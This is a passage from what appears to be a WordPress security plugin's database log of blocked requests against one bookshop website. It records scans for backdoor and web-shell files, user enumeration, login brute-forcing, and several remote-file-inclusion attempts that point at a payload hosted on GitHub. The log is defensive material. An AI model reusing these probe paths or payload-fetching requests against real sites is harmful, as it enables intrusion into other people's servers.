Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','YK2izdeZWUEDrp4I8v319Tgt',0,1637655670.3550,415,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','mR7Lx46svBHt8rhje23Cc9KZ',0,1637655672.3590,473,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/css/wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','mM8y6x1aCVnSQOf9ptAd7P5N',0,1637655674.3478,388,'','POST',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','PytLQzUdW5vZFoh3CEerxVI2',0,1637655676.3791,385,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','S1j4iQk3sJ6o9RpMrHcO0t8u',0,1637655678.4981,408,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','N0TYD5S6oa7sXxtALh2fvKdn',0,1637655680.6604,397,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/haders.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','YNGbgCmHfMZnyOJR8oA1Bkhw',0,1637655682.6828,424,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/wp-old-index.php?action=login&pass=-1&submit=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ZRpTPzNGAIySDwbd65tLmg7Y',0,1637655684.7723,452,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','uKzDTHBW5S9081hpeljknCfF',0,1637655686.6534,397,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','RAn9tWSTwpaxvjzhuZMGNKX0',0,1637655688.7209,156,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/lfx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','HWwhMTDQpykncoIrd6EYuqVP',0,1637655690.5718,390,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','wB5ZNxsYyr3IVjtelM8zAn4O',0,1637655692.6502,404,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','FwWZBsNDrYTX9MLi0ofChpeq',0,1637655694.8595,388,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','XO72ZMDmxQLY0S96CwV1zPlJ',0,1637655696.8111,398,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','IfqiBPo8QX25ZDWYmAOkhUy3',0,1637655698.5417,403,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/test.php?Ghost=send','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','rZ9Dbs5WYkRL0uJTvaUdl7P8',0,1637655700.6051,386,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/langar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','qB02awzTkJhxnZ8LvWPmGs7C',0,1637655702.6006,374,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','yZ2PhMOJaXSVjGIl93k5dvxc',0,1637655704.8247,397,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','O28s6hxFftQdRmCq4gvyYVaT',0,1637655707.7625,396,'','GET',403,0,700,0,1,'',0),('217.79.179.7',3645879047,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','BAXRpVrceU7wMfHPxKsCjuON',0,1637656050.1512,411,'','POST',403,0,600,0,1,'',0),('178.128.179.32',2994778912,'','https://ashbooks.co.uk/wp-json/wp/v2/users/1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/27.0.1453.93 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','DGMxBqHFW6iJ50mRIlykthzT',0,1637657257.2398,507,'','GET',403,0,520,0,1,'',0),('178.128.179.32',2994778912,'','https://ashbooks.co.uk/wp-json/wp/v2/users/2','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/27.0.1453.93 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','eZTnaqfgDr5NVtuWX9x371bd',0,1637657257.9077,152,'','GET',403,0,520,0,1,'',0),('178.128.179.32',2994778912,'','https://ashbooks.co.uk/wp-json/wp/v2/users/3','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/27.0.1453.93 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','e60OiNk98KmL5lJv41cStZnI',0,1637657258.2383,502,'','GET',403,0,520,0,1,'',0),('178.128.179.32',2994778912,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/27.0.1453.93 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','BPmNOkjAzWVEnbMX1Z3gcQHd',0,1637657259.6590,587,'','POST',403,0,600,0,1,'',0),('178.128.179.32',2994778912,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/27.0.1453.93 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','zygkTfCbw67BHEFxqOt3o9lL',0,1637657261.1555,507,'','POST',403,0,600,0,1,'',0),('178.128.179.32',2994778912,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/27.0.1453.93 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','9ydUaSGf2AxDcYXLrCJMTW8u',0,1637657262.5392,503,'','POST',403,0,600,0,1,'',0),('178.128.179.32',2994778912,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/27.0.1453.93 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','aWCmF1ZM26zy39DAbGc8TOLB',0,1637657263.6351,490,'','POST',403,0,600,0,1,'',0),('178.128.179.32',2994778912,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/27.0.1453.93 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','Cy3uEtjlfVagenG1vPzSKkLs',0,1637657264.7009,548,'','POST',403,0,600,0,1,'',0),('178.128.179.32',2994778912,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/27.0.1453.93 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','lmGR6Ke7ZNcYJMLHhpfw4Toa',0,1637657265.7443,426,'','POST',404,0,700,0,1,'',0),('178.128.179.32',2994778912,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/27.0.1453.93 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','P8uNVDfSl1E9Tm3RxOXZps0Y',0,1637657266.6693,482,'','POST',404,0,700,0,1,'',0),('178.128.179.32',2994778912,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/27.0.1453.93 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','8qTOhfi5eRbZ6SdBlLI3zVvY',0,1637657267.7268,171,'','POST',404,0,700,0,1,'',0),('178.128.179.32',2994778912,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/27.0.1453.93 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','em58sZE2zPRTopYCUrbQ0SNn',0,1637657268.3911,490,'','POST',404,0,700,0,1,'',0),('178.128.179.32',2994778912,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/27.0.1453.93 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','uR5LXHzlJ8ogkaitV7SIp41O',0,1637657269.3952,468,'','POST',404,0,700,0,1,'',0),('178.128.179.32',2994778912,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/27.0.1453.93 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','GvwkaEsChDrZyKVtIgHuzQ2f',0,1637657270.3790,507,'','POST',404,0,700,0,1,'',0),('178.128.179.32',2994778912,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/27.0.1453.93 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','Uv1saHhQIODLyPbZcoMK20iC',0,1637657271.3559,443,'','POST',404,0,700,0,1,'',0),('178.128.179.32',2994778912,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/27.0.1453.93 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','cEkxGmQVyrgafo4s8KnqFNuW',0,1637657272.2832,474,'','POST',404,0,700,0,1,'',0),('178.128.179.32',2994778912,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/27.0.1453.93 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','UOAQ0ucb1r8vomLlwyP2tTXG',0,1637657273.2389,490,'','POST',404,0,700,0,1,'',0),('178.128.179.32',2994778912,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/27.0.1453.93 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','DPkjUdZmFg4ycbrpsV0JtQER',0,1637657274.2212,508,'','POST',404,0,700,0,1,'',0),('178.128.179.32',2994778912,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/27.0.1453.93 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','S7Uy3ve4zOhgVFnpGTNoqldw',0,1637657275.2176,505,'','POST',404,0,700,0,1,'',0),('178.128.179.32',2994778912,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/27.0.1453.93 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','zyPXhQZieOdD6Vm9lnvtFkuf',0,1637657276.2252,471,'','POST',404,0,700,0,1,'',0),('178.128.179.32',2994778912,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/27.0.1453.93 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','AGfkm3zXvnlKpE54t7qJNIjF',0,1637657277.1944,452,'','POST',404,0,700,0,1,'',0),('178.128.179.32',2994778912,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/27.0.1453.93 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','1nb9UzQDvXi5BOCaFWRL0wAM',0,1637657278.1573,528,'','POST',404,0,700,0,1,'',0),('178.128.179.32',2994778912,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/27.0.1453.93 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','Sk1mMG4t5q0vC2W6iYKRBDrN',0,1637657279.2028,505,'','POST',404,0,700,0,1,'',0),('178.128.179.32',2994778912,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/27.0.1453.93 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','2h1mpxvNEkc9y0MwKdVYauBW',0,1637657280.2245,549,'','POST',404,0,700,0,1,'',0),('82.208.189.233',1389411817,'','https://ashbooks.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.12; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','nlv4u5Pbx6o9IZ2EC8My0RjO',0,1637660047.2587,477,'','GET',403,0,700,0,1,'',0),('137.184.220.57',2310593593,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4240.193 Safari\\/537.36\"}','tVY0JHGDOliPh98aXw3Luo1d',0,1637663379.9721,879,'','GET',403,0,520,0,1,'',0),('192.187.118.202',3233511114,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','3fAw80utJa4NElLIcmRZn7ry',0,1637667086.7710,218,'','POST',403,0,600,0,1,'',0),('69.30.225.182',1159651766,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','A27MjRED1GWIgYZSuBnsdFTL',0,1637671514.1669,748,'','POST',403,0,600,0,1,'',0),('173.208.152.235',2916129003,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','4W2xPCkeMOBHht9bTAIKX16d',0,1637681937.8775,192,'','POST',403,0,600,0,1,'',0),('69.197.160.228',1170579684,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D201 Safari\\/9537.53\"}','D9VFlK2QvRAXJjipd4rk8mTC',0,1637682761.8769,169,'','POST',403,0,600,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','JOozPAlrqSX3QWnMk4YyC1IE',0,1637685383.4252,423,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','RwVOg1pPMHcSWXtuzl9AYTLC',0,1637685385.3129,780,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','r8tBWnVp3HegqljciTNFhPSw',0,1637685387.5139,427,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','XRuMqjv8EZ9aVHUApesiNoFt',0,1637685389.6590,379,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/boom.php?x','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Fh0RAwBirgQp52PkuGbZdOEz',0,1637685395.6686,412,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/backup_index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','3xn75zm4sHpFdfXhD1vtoLSO',0,1637685397.4079,405,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/db_cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','unkZFHMzXK8vfGLsITDbOWVN',0,1637685399.1491,418,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','PyU3QekW6c4LMrxlICsKbXFm',0,1637685401.0468,416,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','YOGSeiaZJ9IxQTWDlodzthCn',0,1637685404.5293,408,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','xfR9EgisYGaTULZrDvlPXpQy',0,1637685406.5245,385,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','jUdnRLm54qMBfyYO8eNVrpcu',0,1637685408.5336,419,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/alfindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','GcVNRQB1pz23oSXOq5sg4FWY',0,1637685410.3879,417,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','twFHW2TA1lSqB6yNJ0OshZaj',0,1637685412.4653,438,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-booking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Yi5Jx8lVa3stnwjMDu40fkRz',0,1637685414.4015,709,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/cindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','0Xu7rFp5aLk6WBt3edUoEwAM',0,1637685416.5659,398,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','nLUfg9APem2dxkGNl68CtZHc',0,1637685418.5763,695,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','DA6Y2rQRnVat9OePSjqvJ1BX',0,1637685421.1574,871,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/fonts/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','XpBcqV2CAKZF4sOuijNw8L5W',0,1637685423.7807,390,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','QrqBh2zoJmMVDC8iGUbdgXjF',0,1637685426.0653,551,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','YI6sdPXZoefSw72DpbMVuyjc',0,1637685428.5204,390,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','p73blALxFT5gX9Bc0VzudCQa',0,1637685430.4142,397,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-admin/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','iDGrzXYbC94seJAKjOIvyF1M',0,1637685432.3375,426,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 